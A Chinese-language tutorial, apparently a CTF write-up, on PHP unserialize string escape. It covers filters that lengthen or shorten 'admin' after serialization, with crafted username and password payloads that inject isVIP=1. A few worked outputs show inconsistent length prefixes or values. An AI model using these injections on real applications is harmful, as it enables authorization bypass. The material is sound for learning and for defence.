前言:
众所周知php反序列化字符串逃逸,分为2种类型(字符串增多,字符串减少)。但网上大多数文章讲的都是增加一个字符或者减少一个字符串。对于增加减少多个字符串进行逃逸的文章,却少有人提及。本篇文章在特定源码的基础上,对增加减少多个字符串的情况进行简单分析。需要你有一定的字符串逃逸理论基础。如有错误欢迎批评指正。
一、字符串增多
1.1代码如下
假设前提必须使用admin才行
此时$p在}之后,随便写什么都可以,故没有放入文中
<?php
class user{
    // Public, untyped fields. unserialize() fills them straight from the
    // serialized text without running __construct, so whatever isVIP value
    // appears in attacker-controlled input is taken as-is.
    public $username;
    public $password;
    public $isVIP;

    /**
     * Builds a regular (non-VIP) user; isVIP is always 0 on this path.
     *
     * @param mixed $u username
     * @param mixed $p password
     */
    public function __construct($u, $p){
        $this->isVIP = 0;
        $this->username = $u;
        $this->password = $p;
    }

    /**
     * Echoes the flag message when isVIP == 1, otherwise the failure message.
     * The comparison is loose (==), so "1", 1.0 and true pass as well; a
     * hardened version would compare with === and, more importantly, would
     * never unserialize user-controlled data (a JSON DTO avoids the issue).
     */
    public function login(){
        echo ($this->isVIP == 1) ? 'flag is niubi' : 'fuck';
    }
}
//这里替换,分别增加1,2,3个字符
/**
 * Post-serialization filter used by the article: every "admin" in $obj is
 * swapped for a longer string. Run on an already serialized object, this
 * changes the text length while the s:N length prefixes stay unchanged,
 * which is the root cause of the escape analysed below. Filtering the field
 * values before serialize(), or never unserializing user-controlled input,
 * removes the problem.
 *
 * @param string $obj serialized object text
 * @return string|null filtered text (null when preg_replace reports an error)
 */
function filter($obj) {
    $needle = "/admin/";
    // "或者" ("or") is the author's shorthand for the three variants tried in
    // sections 1.2-1.4; each example run uses exactly one of them.
    $substitute = "hacker或者hackerr或者hackerrr";
    return preg_replace($needle, $substitute, $obj);
}
1.2增加1个字符
//单个替换后,增加1了个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}共计47个字符,用47个admin替换hacker,使";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}逃逸出去
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}"
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:282:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:282:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
1.3增加2个字符
//单个替换后增加了2个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hackerr";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}"
//注意:47/2=23余1,多1位,$u可控所以$u内部s:5:"12345",让其少1位
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:161:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:161:"hackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerrhackerr";s:8:"password";s:5:"12345";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
1.4增加3个字符
//单个替换后增加了3个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hackerrr";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u="adminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}"
//注意同理47/3=15余2,多两个,$u可控s:4:"1234"
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:120:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:120:"hackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrrhackerrr";s:8:"password";s:4:"1234";s:5:"isVIP";i:1;}";s:8:"password";s:3:"123";s:5:"isVIP";i:1;}
二、字符串减少
假设前提必须使用admin才行
<?php
class user{
    // Public, untyped fields. unserialize() restores them directly from the
    // serialized text and does not call __construct, so an isVIP value coming
    // from attacker-controlled input is accepted unchanged.
    public $username;
    public $password;
    public $isVIP;

    /**
     * Creates a regular (non-VIP) user; isVIP is always 0 when built this way.
     *
     * @param mixed $u username
     * @param mixed $p password
     */
    public function __construct($u, $p){
        $this->isVIP = 0;
        $this->username = $u;
        $this->password = $p;
    }

    /**
     * Prints the flag message if isVIP == 1, else the failure message.
     * Loose comparison means "1", 1.0 and true also pass; a hardened version
     * uses === and, above all, never unserializes untrusted data.
     */
    public function login(){
        $granted = ($this->isVIP == 1);
        echo $granted ? 'flag is niubi' : 'fuck';
    }
}
//这里替换,分别减少1,2,3,4个字符
/**
 * Post-serialization filter for the "string shrinks" case: every "admin" in
 * $obj is replaced by a shorter string. Because the replacement runs on the
 * serialized text, the s:N length prefixes no longer match the content, which
 * is what section 2 exploits. Validating field values before serialize(), or
 * not unserializing user-controlled input at all, prevents this.
 *
 * @param string $obj serialized object text
 * @return string|null filtered text (null when preg_replace reports an error)
 */
function filter($obj) {
    $needle = "/admin/";
    // "或者" ("or") is the author's shorthand for the four variants tried in
    // section 2; each example run uses exactly one of them.
    $substitute = "hack或者hac或者ha或者h";
    return preg_replace($needle, $substitute, $obj);
}
2.1减少1个字符
//单个替换减少1个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hack";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//";s:8:"password";s:6:"是不可能动的部分共计22个字符 ";s:8:"password";s:6:"之后的123456可以由$p控制
//由于替换每次每个admin-hack减少1个字符,总计需要22个admin
$u='adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:110:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}
O:4:"user":3:{s:8:"username";s:110:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}
2.2减少2个字符
//单个替换减少2个字符
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"hac";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
//同理22/2=11用11个admin
$u='adminadminadminadminadminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
//下面为替换后实际匹配对比
O:4:"user":3:{s:8:"username";s:55:"adminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:55:"hachachachachachachachachachachac";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
2.3减少3个字符
先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"ha";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u='adminadminadminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
O:4:"user":3:{s:8:"username";s:35:"adminadminadminadminadminadminadmin";s:8:"password";s:45:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:35:"hahahahahahaha";s:8:"password";s:45:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
2.4减少4个字符
先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面
O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:5:"h";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}
$u='adminadminadminadminadmin'
$p=';s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}'
O:4:"user":3:{s:8:"username";s:25:"adminadminadminadminadmin";s:8:"password";s:46:";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:1;}
O:4:"user":3:{s:8:"username";s:25:"hhhhh";s:8:"password";s:46:";s:8:"password";s:6:"1